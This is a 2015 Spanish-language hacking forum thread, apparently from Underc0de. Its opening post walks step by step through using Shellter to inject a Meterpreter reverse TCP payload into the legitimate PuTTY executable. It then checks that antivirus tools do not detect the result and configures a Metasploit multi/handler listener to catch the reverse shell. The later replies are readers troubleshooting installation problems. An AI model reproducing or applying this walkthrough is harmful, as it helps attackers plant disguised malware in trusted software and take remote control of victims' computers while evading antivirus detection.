Evadiendo Antivirus con Shellter

  • 6 Respuestas
  • 8345 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LionSec

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • lionsec.net
    • Email

Evadiendo Antivirus con Shellter

  • en: Julio 13, 2015, 04:32:00 pm
Shellter es una herramienta dinámica de inyección de shellcode . Puede ser ustilizado para inyectar código shell en las aplicaciones nativas de Windows (Sólo 32 bits por el momento).
Puedes inyectar tu propio código o uno generado con un Framework, como Metasploit por ejemplo.
Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación .

Para más información visita : You are not allowed to view links. Register or Login.

Instalación

Lo primero que haremos es descargarlo desde su página oficial (You are not allowed to view links. Register or Login) . Es compatible con Windows , Linux y Mac (Usando wine) .
Instalación en kali linux (Si aún no tienes instalado Wine)

Código: Bash
  1. apt-get update
  2. apt-get install shellter
  3.  
Instalación en backbox

Primero hay que agregar los repositorios :

Código: Bash
  1. nano /etc/apt/sources.list

Añadimos las siguientes entradas :

Código: You are not allowed to view links. Register or Login
deb http://ppa.launchpad.net/backbox/four/ubuntu trusty main
deb-src http://ppa.launchpad.net/backbox/four/ubuntu trusty main

Código: Bash
  1. apt-get update
  2. apt-get install shellter

Instalación en Arch Linux :

Código: Bash
  1. yaourt -Syy
  2. yaourt -S aur/shellter


En mi caso , estoy usando LionSec Linux (Basado en backbox) .

Una vez instalado , la siguente fase sería la ejecución .

Para ejecutarlo tecleamos "shellter" en la terminal , o "wine shellter.exe" para los que ya tenien instalado Wine .
Una vez ejecutado , elegimos la opción "Automatique"  (A) .



Después indicamos la ruta del archivo al que queremos inyectar el shellcode . Yo utilisaré putty .



Ahora tenemos que indicar si queremos configurar un payload o elgir uno de la lista que nos propone Shellter. Podemos elegir la opción "L" (Listed) si queremos utilizar uno que ya aparece en la lista , "C" (Configure) para configurarlo manualmente .

Vamos a teclear (L)



Después seleccionamos el payload que vamos a utilizar . Yo elegiré el primero (Meterpreter_Reverse_TCP) .

A continuación indicamos nuestra dirección IP y el puerto de escucha .



Y ya habremos terminado con Shellter .

Bueno ahora vamos a escanear nuestro archivo , en NoDistribute por ejemplo(Recomendado) .
Resultado




:) :)

OK , sólo nos queda configurar el "listener" .

Código: You are not allowed to view links. Register or Login
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
exploit



En mi máquina de prueba , dotada de 1 un antivirus , voy a ejecutar mi archivo (putty) . Y como me lo esperaba , no salta ninguna alerta y se ejecuta sin problema .



Demo


Bueno amigos , eso ha sido todo . Espero que le sirva a más de uno .

Fuente : You are not allowed to view links. Register or Login


Saludos
« Última modificación: Agosto 07, 2015, 09:43:18 pm por Gabriela »

Desconectado Vector

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:Evadiendo Antivirus con Shellter

  • en: Julio 13, 2015, 10:10:41 pm
excelente aporte @You are not allowed to view links. Register or Login probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR

Desconectado LionSec

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • lionsec.net
    • Email

Re:Evadiendo Antivirus con Shellter

  • en: Julio 14, 2015, 03:28:16 am
You are not allowed to view links. Register or Login
excelente aporte @You are not allowed to view links. Register or Login probaré que tal funciona y preguntaré por dudas que presente en el momento, aunque no debería tenerlas si está explicado paso a paso :)

Saludos!
VECTOR
Gracias @You are not allowed to view links. Register or Login , espero que te sirva

Desconectado gr0ny

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Evadiendo Antivirus con Shellter

  • en: Julio 29, 2015, 07:53:46 pm
Hola buenas tardes, primero que todo muy buen aporte; muchas gracias.
Tengo un problema:
- Cuando llego a la parte de seleccionar los payloads no se muestra ninguno, queda en Select payload... Pero no se muestra ningun payload a seleccionar.
Me podrian ayudar por fa?

Gracias

Desconectado Vector

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:Evadiendo Antivirus con Shellter

  • en: Agosto 30, 2015, 12:31:00 pm
Hola @You are not allowed to view links. Register or Login, mmm que OS usas??, yo usé Kali v1 y funcionó perfecto, eso si que tube que instalar el Wine, y eso que no se muestren los payloads... prueba iniciando la DB con #service postgresql start y prueba el shellter.

documentacion de kali: You are not allowed to view links. Register or Login
espero por ayudarte.

Saludos.
Vector  ;D

Desconectado - ALEAJANDRO -

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Evadiendo Antivirus con Shellter

  • en: Octubre 17, 2015, 08:46:39 pm
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Desconectado zupa

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • Hacktivism is life
    • Ver Perfil

Re:Evadiendo Antivirus con Shellter

  • en: Octubre 19, 2015, 01:29:06 pm
You are not allowed to view links. Register or Login
Funciona con Kali 2.0 en 64 bits? Porque yo no lo puedo hacer andar  :-\
Me da error Wine al querer correr shellter.exe

Se mas especifico para poder ayudarte, que tipo de error te da.

 

[Leer] Test para tu Firewall, Antivirus & Navegadores

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 2740
Último mensaje Junio 24, 2011, 12:02:36 am
por LucaSthefano
HERCULES: Genera un payload y evade los antivirus

Iniciado por afravaz

Respuestas: 2
Vistas: 4151
Último mensaje Septiembre 09, 2016, 04:07:48 pm
por ro0tmag
Como eliminar Virus del Pc sin antivirus

Iniciado por k43l

Respuestas: 4
Vistas: 5582
Último mensaje Enero 20, 2013, 10:21:01 pm
por k43l
Veil – Evasión de Antivirus

Iniciado por Stuxnet

Respuestas: 1
Vistas: 3127
Último mensaje Diciembre 12, 2013, 09:45:48 am
por ANTRAX
Prueba tu antivirus con Wicar

Iniciado por rreedd

Respuestas: 1
Vistas: 2239
Último mensaje Enero 31, 2018, 03:17:16 am
por user_en1gm4